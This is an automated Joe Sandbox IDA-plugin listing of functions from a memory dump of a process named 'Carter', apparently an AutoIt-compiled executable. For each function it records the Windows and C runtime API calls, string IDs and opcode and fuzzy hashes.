                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: cedc41d1d7064f425630006624201a3cbcf13fdf0793f175888fc91d25da06b4
                                                                            • Instruction ID: 5ac055e2926275e66a6183a3746b0a815c5ec8d83e2aba4c1555f27136420f48
                                                                            • Opcode Fuzzy Hash: cedc41d1d7064f425630006624201a3cbcf13fdf0793f175888fc91d25da06b4
                                                                            • Instruction Fuzzy Hash: F4115A71921218BFDB218FA8DC84EEEBBBCEF05740F00855AF809D7110D7719E6497A0
                                                                            APIs
                                                                              • Part of subcall function 0029593C: __FF_MSGBANNER.LIBCMT ref: 00295953
                                                                              • Part of subcall function 0029593C: __NMSG_WRITE.LIBCMT ref: 0029595A
                                                                              • Part of subcall function 0029593C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000004,?,?,00291003,?), ref: 0029597F
                                                                            • std::exception::exception.LIBCMT ref: 0029101C
                                                                            • __CxxThrowException@8.LIBCMT ref: 00291031
                                                                              • Part of subcall function 002987CB: RaiseException.KERNEL32(?,?,?,0032CAF8,?,?,?,?,?,00291036,?,0032CAF8,?,00000001), ref: 00298820
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                            • String ID: `=0$h=0
                                                                            • API String ID: 3902256705-716891533
                                                                            • Opcode ID: 0b228830493a25531d6a803078f3c86f3a82a28e831a44c5489f597a084db6e9
                                                                            • Instruction ID: 93962dfe18eef4e37d03dd1c156cab3b557b6446fefa18af471eaf48918ffc15
                                                                            • Opcode Fuzzy Hash: 0b228830493a25531d6a803078f3c86f3a82a28e831a44c5489f597a084db6e9
                                                                            • Instruction Fuzzy Hash: 4DF0C83956421EA6DF21BE99EC159DEBBAC9F01310F100469FD14966D1DFB18BB0CAE0
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,00302C4C), ref: 002D3F57
                                                                            • GetLastError.KERNEL32 ref: 002D3F66
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 002D3F75
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00302C4C), ref: 002D3FD2
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: 91d88752b027c9cdad125f6a7bf358941e1a11af8741f64e655e6e7ef3a51ee1
                                                                            • Instruction ID: 5a686972edaae4b56053298b8e5bbf5d0f2aa46c91d66d30bff6dccc18048ab9
                                                                            • Opcode Fuzzy Hash: 91d88752b027c9cdad125f6a7bf358941e1a11af8741f64e655e6e7ef3a51ee1
                                                                            • Instruction Fuzzy Hash: A921D07492A2059FC300EF28D8818AAB7F8AE45364F104A1AF495C37E1D7308E2ACB43
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00285B58
                                                                              • Part of subcall function 002856F8: _memset.LIBCMT ref: 00285787
                                                                              • Part of subcall function 002856F8: _wcscpy.LIBCMT ref: 002857DB
                                                                              • Part of subcall function 002856F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002857EB
                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00285BAD
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00285BBC
                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002C0D7C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1378193009-0
                                                                            • Opcode ID: 6deec097e3c18eb70aec7e824447567f62717193be7624798605134360b5f87d
                                                                            • Instruction ID: e9ff1945ca6416b375478b61609911163372d7d86b765d607521f0100be119c0
                                                                            • Opcode Fuzzy Hash: 6deec097e3c18eb70aec7e824447567f62717193be7624798605134360b5f87d
                                                                            • Instruction Fuzzy Hash: 88213774515794AFEB739B64C8D5FEBBBECEF11308F00058DE68A56181C3742A94CB41
                                                                            APIs
                                                                              • Part of subcall function 002849C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002827AF,?,00000001), ref: 002849F4
                                                                            • _free.LIBCMT ref: 002BFB04
                                                                            • _free.LIBCMT ref: 002BFB4B
                                                                              • Part of subcall function 002829BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00282ADF
                                                                            Strings
                                                                            • Bad directive syntax error, xrefs: 002BFB33
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                                            • String ID: Bad directive syntax error
                                                                            • API String ID: 2861923089-2118420937
                                                                            • Opcode ID: 09b38b3f5795ba9463d5a7970a318f4ef8255ce3cba17226eb9507a527b0b3c1
                                                                            • Instruction ID: 070355faddac4e7e86e57210ea30e07ac8b05a93e9ac7bed723e1f36a51d2e83
                                                                            • Opcode Fuzzy Hash: 09b38b3f5795ba9463d5a7970a318f4ef8255ce3cba17226eb9507a527b0b3c1
                                                                            • Instruction Fuzzy Hash: 12917F7592021AAFCF08EFA4CD919EDB7B4BF04350F14452AF815AB2A1EB709E25CF50
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: AU3! ?0$EA06
                                                                            • API String ID: 4104443479-2512139867
                                                                            • Opcode ID: ed22ddc9728fffc0b4ddc303ed0ae917ef909e78407ba13abc680c4f5aa5748f
                                                                            • Instruction ID: 7ca5bc007af1fa5c9be613d45a07e44dbb0f955b3a7479e398b735d2adcf0b18
                                                                            • Opcode Fuzzy Hash: ed22ddc9728fffc0b4ddc303ed0ae917ef909e78407ba13abc680c4f5aa5748f
                                                                            • Instruction Fuzzy Hash: EE41AD25A2519A9BDF31BF588891BBF7BA58B45300F584175F882EB2C7D6208DB087E1
                                                                            APIs
                                                                              • Part of subcall function 00284AB2: __fread_nolock.LIBCMT ref: 00284AD0
                                                                            • _wcscmp.LIBCMT ref: 002D9DE1
                                                                            • _wcscmp.LIBCMT ref: 002D9DF4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: b727b21a4275848cec4a423556bf513ac0e7ed87e29d784122d5369dafc92988
                                                                            • Instruction ID: 5d5e4136e22b2c6cd6674151d5e6009643c89686714bf8f136b9811ee9bd6aa3
                                                                            • Opcode Fuzzy Hash: b727b21a4275848cec4a423556bf513ac0e7ed87e29d784122d5369dafc92988
                                                                            • Instruction Fuzzy Hash: 4341E875A5021ABBDF21EEA4CC45FDFBBBDDF45710F00046AF900AB280D6719D548BA4
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002C032B
                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 002C0375
                                                                              • Part of subcall function 00290284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00282A58,?,00008000), ref: 002902A4
                                                                              • Part of subcall function 002909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002909E4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                            • String ID: X
                                                                            • API String ID: 3777226403-3081909835
                                                                            • Opcode ID: e064be4415a40dfe9c6f02e217282d3620f59d1b6f81727e8e6bcf7acad72a02
                                                                            • Instruction ID: d692637f78a96757e0916cbceb782e248c237dca3cd5df5b3987b4f0ec0117f2
                                                                            • Opcode Fuzzy Hash: e064be4415a40dfe9c6f02e217282d3620f59d1b6f81727e8e6bcf7acad72a02
                                                                            • Instruction Fuzzy Hash: 0021C375A212989BDF01DF94D845BEE7BFC9F49704F00405AE808E7281DBF45A99CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1102cf87dc551da68a9a55544a91171cb65e8aeb5db58ce7e9e7722f9b11a88d
                                                                            • Instruction ID: 9c75c8cea6fd223d5f9ece4be514e7d59b959901ce45a0c0785b41d639d72f42
                                                                            • Opcode Fuzzy Hash: 1102cf87dc551da68a9a55544a91171cb65e8aeb5db58ce7e9e7722f9b11a88d
                                                                            • Instruction Fuzzy Hash: 0AF168706183419FCB14DF29C480A6ABBE5FF88314F54892EF8999B392D770E955CF82
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 81d29f1453c2943c82ca2090129cbdc7f7186f87f47ffe0a3fb9e7682431b33e
                                                                            • Instruction ID: 6d995d25fd9dbde45e27ce5135556e984e5f348fe37dbc77936285d1c4041731
                                                                            • Opcode Fuzzy Hash: 81d29f1453c2943c82ca2090129cbdc7f7186f87f47ffe0a3fb9e7682431b33e
                                                                            • Instruction Fuzzy Hash: 7A61DD75620209EBDF049F29D980AAA7BB8FF44350F1581A9EC59CF2D4EB31DA71CB50
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002859F9
                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00285A9E
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00285ABB
                                                                            Similarity
                                                                            • API ID: IconNotifyShell_$_memset
                                                                            • String ID:
                                                                            • API String ID: 1505330794-0
                                                                            • Opcode ID: 167494728a1cd077f19c8f0d63c1b0822a735cef6295070cd41065120cd86846
                                                                            • Instruction ID: 0d72b23e803127cef5ff24f6203e8180f261dc675e7a33dfdb73ea16927f23e8
                                                                            • Opcode Fuzzy Hash: 167494728a1cd077f19c8f0d63c1b0822a735cef6295070cd41065120cd86846
                                                                            • Instruction Fuzzy Hash: A33191B45167128FC725EF24D8C4697BBE8FB48304F000E2EF99AC3280E771A954CB92
                                                                            APIs
                                                                            • __FF_MSGBANNER.LIBCMT ref: 00295953
                                                                              • Part of subcall function 0029A39B: __NMSG_WRITE.LIBCMT ref: 0029A3C2
                                                                              • Part of subcall function 0029A39B: __NMSG_WRITE.LIBCMT ref: 0029A3CC
                                                                            • __NMSG_WRITE.LIBCMT ref: 0029595A
                                                                              • Part of subcall function 0029A3F8: GetModuleFileNameW.KERNEL32(00000000,003353BA,00000104,00000004,00000001,00291003), ref: 0029A48A
                                                                              • Part of subcall function 0029A3F8: ___crtMessageBoxW.LIBCMT ref: 0029A538
                                                                              • Part of subcall function 002932CF: ___crtCorExitProcess.LIBCMT ref: 002932D5
                                                                              • Part of subcall function 002932CF: ExitProcess.KERNEL32 ref: 002932DE
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            • RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000004,?,?,00291003,?), ref: 0029597F
                                                                            Similarity
                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1372826849-0
                                                                            • Opcode ID: de050984e06b0148eb91198800cc1eebf9cd246c1951327c7073b9073936caa6
                                                                            • Instruction ID: c2786c1671068469e5a0ec020996709dd59e6dc7fafca4c31532faa4d9d940d6
                                                                            • Opcode Fuzzy Hash: de050984e06b0148eb91198800cc1eebf9cd246c1951327c7073b9073936caa6
                                                                            • Instruction Fuzzy Hash: 56019E36371B22DAFE176B349C42B2E32989F52770F51052AF819EB191DEB08D204BE1
                                                                            APIs
                                                                            • _free.LIBCMT ref: 002D92D6
                                                                              • Part of subcall function 00292F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292F99
                                                                              • Part of subcall function 00292F85: GetLastError.KERNEL32(00000000,?,00299C54,00000000,00298D5D,002959C3), ref: 00292FAB
                                                                            • _free.LIBCMT ref: 002D92E7
                                                                            • _free.LIBCMT ref: 002D92F9
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                            • Instruction ID: 6e2f261368edc595156602912b614f31682921cbcdf7a71d42b82975486b3e23
                                                                            • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                            • Instruction Fuzzy Hash: 10E0C2A1324603A3CE20A9386884E8377FC0F88311724050FB80AD3A82CE20ECA08468
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CALL
                                                                            • API String ID: 0-4196123274
                                                                            • Opcode ID: f53da50b3cb16b64ab7a632f5574e52c147225da0817c96a0278be761acaa88d
                                                                            • Instruction ID: 8b0abf93f36854189a844eae60c4f114a37976ed73cd714551e80dbcb997e2d2
                                                                            • Opcode Fuzzy Hash: f53da50b3cb16b64ab7a632f5574e52c147225da0817c96a0278be761acaa88d
                                                                            • Instruction Fuzzy Hash: 50325974528712CFCB24DF14C498A2AB7E1BF85304F15895DE88A9B362DB71EC61CF82
                                                                            APIs
                                                                            • _strcat.LIBCMT ref: 002EE20C
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • _wcscpy.LIBCMT ref: 002EE29B
                                                                            Similarity
                                                                            • API ID: __itow__swprintf_strcat_wcscpy
                                                                            • String ID:
                                                                            • API String ID: 1012013722-0
                                                                            • Opcode ID: cefd85626afece1b4c69afc47ba17b2d1473b16c85cfdb01e130499fe28ebe66
                                                                            • Instruction ID: 6a9695a1ce09ceb58575f986b051619722b4b52267c8a247bee2ac08a83fc9fb
                                                                            • Opcode Fuzzy Hash: cefd85626afece1b4c69afc47ba17b2d1473b16c85cfdb01e130499fe28ebe66
                                                                            • Instruction Fuzzy Hash: 71913935A20615DFCB18EF19C581969B7E5EF49310B96C09AE85A8F362DB30ED61CF80
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 002D614E
                                                                            Similarity
                                                                            • API ID: BuffCharLower
                                                                            • String ID:
                                                                            • API String ID: 2358735015-0
                                                                            • Opcode ID: 3352a114548bd13b7b22ed7e3e7349b6026d35e7687aac052bd8ee888dfbb91e
                                                                            • Instruction ID: c95f79c50c79aff2c575766284ea020ffeb790b7a83d29d9267b6a91420d0ace
                                                                            • Opcode Fuzzy Hash: 3352a114548bd13b7b22ed7e3e7349b6026d35e7687aac052bd8ee888dfbb91e
                                                                            • Instruction Fuzzy Hash: 4941A5B65102099FDB11EFA8C8859AEB3B8EB44350B10452FE95A97381EB70DE65CB50
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleMode
                                                                            • String ID:
                                                                            • API String ID: 3953868439-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 31cf4ce80c87067fc57b813c61f11bca9fc8b4a34947cc762a1c6037067fbf97
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: E131C471A1010ADFDB18DF58C4C0969F7A6FF59300B648AA5E449CB651EB71EDE1CB80
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 00285FEF
                                                                              • Part of subcall function 0029359C: __lock.LIBCMT ref: 002935A2
                                                                              • Part of subcall function 0029359C: DecodePointer.KERNEL32(00000001,?,00286004,002C8892), ref: 002935AE
                                                                              • Part of subcall function 0029359C: EncodePointer.KERNEL32(?,?,00286004,002C8892), ref: 002935B9
                                                                              • Part of subcall function 00285F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00285F18
                                                                              • Part of subcall function 00285F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00285F2D
                                                                              • Part of subcall function 00285240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0028526C
                                                                              • Part of subcall function 00285240: IsDebuggerPresent.KERNEL32 ref: 0028527E
                                                                              • Part of subcall function 00285240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002852E6
                                                                              • Part of subcall function 00285240: SetCurrentDirectoryW.KERNEL32(?), ref: 00285366
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0028602F
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                            • String ID:
                                                                            • API String ID: 1438897964-0
                                                                            • Opcode ID: 7809ab55ca21dfc9ea085e0b4fc6e7761b04225ba33532474d7ad6f221234624
                                                                            • Instruction ID: 7fe2d113aad086091ae63c5218bf2d4fdbb94eec4fc1fd230f122aa9ee3c8b5b
                                                                            • Opcode Fuzzy Hash: 7809ab55ca21dfc9ea085e0b4fc6e7761b04225ba33532474d7ad6f221234624
                                                                            • Instruction Fuzzy Hash: 75118E718193059BC721EF69EC4994ABBECEF98710F00891EF484872A2DB709554CF95
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00283E72,?,?,?,00000000), ref: 00284327
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00283E72,?,?,?,00000000), ref: 002C0717
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: d67caa264b848258048fa86c574a6c6261cc88b4af2c77c1022d5a561ca98e63
                                                                            • Instruction ID: 400f6bd289b6b33e1a705882f4ed6e7c9e9f99fd8c1f80cdee4ba52e1b84abbc
                                                                            • Opcode Fuzzy Hash: d67caa264b848258048fa86c574a6c6261cc88b4af2c77c1022d5a561ca98e63
                                                                            • Instruction Fuzzy Hash: 0701967415530ABFF3252E14CC8AF667A9CEB0176CF24C319FAE86A1D0C6B15C558B54
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            APIs
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            • __lock_file.LIBCMT ref: 0029560B
                                                                              • Part of subcall function 00296E3E: __lock.LIBCMT ref: 00296E61
                                                                            • __fclose_nolock.LIBCMT ref: 00295616
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: SleepTimetime
                                                                            • String ID:
                                                                            • API String ID: 346578373-0
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 00295EB4
                                                                            • __ftell_nolock.LIBCMT ref: 00295EBF
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            Similarity
                                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2999321469-0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00285AEF
                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00285B1F
                                                                            Similarity
                                                                            • API ID: IconNotifyShell__memset
                                                                            • String ID:
                                                                            • API String ID: 928536360-0
                                                                            Similarity
                                                                            • API ID: LoadString$__swprintf
                                                                            • String ID:
                                                                            • API String ID: 207118244-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            APIs
                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 002841B2
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            APIs
                                                                              • Part of subcall function 00284B29: FreeLibrary.KERNEL32(00000000,?), ref: 00284B63
                                                                              • Part of subcall function 0029547B: __wfsopen.LIBCMT ref: 00295486
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002827AF,?,00000001), ref: 002849F4
                                                                              • Part of subcall function 00284ADE: FreeLibrary.KERNEL32(00000000), ref: 00284B18
                                                                              • Part of subcall function 002848B0: _memmove.LIBCMT ref: 002848FA
                                                                            Similarity
                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                            • String ID:
                                                                            • API String ID: 1396898556-0
                                                                            • Opcode ID: efed6cfcc902b27ac91cbbbd91368af6254158eb7a7aedbbae5e47054ea24ac3
                                                                            • Instruction ID: 48eed070100ab17a71939e99d696cd5b29b228b854d5f9a66b114d1dac08fb46
                                                                            • Opcode Fuzzy Hash: efed6cfcc902b27ac91cbbbd91368af6254158eb7a7aedbbae5e47054ea24ac3
                                                                            • Instruction Fuzzy Hash: 1E110835671216ABCB18FF60CC22FAE76A99F40701F10841DF941AA1C1EE749A20AF94
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 0b5ba63b443926817dd58069e96eeb15336b8a02520d3bb54debac5164c8810d
                                                                            • Instruction ID: bb01f731d40f7a6a55cf4fdac261a22a6ffd1a04f375e5692dee7c627332f95e
                                                                            • Opcode Fuzzy Hash: 0b5ba63b443926817dd58069e96eeb15336b8a02520d3bb54debac5164c8810d
                                                                            • Instruction Fuzzy Hash: 72213374528352CFCB14DF14C458B1ABBE4BF84304F098968F88A57322C731E869CF92
                                                                            APIs
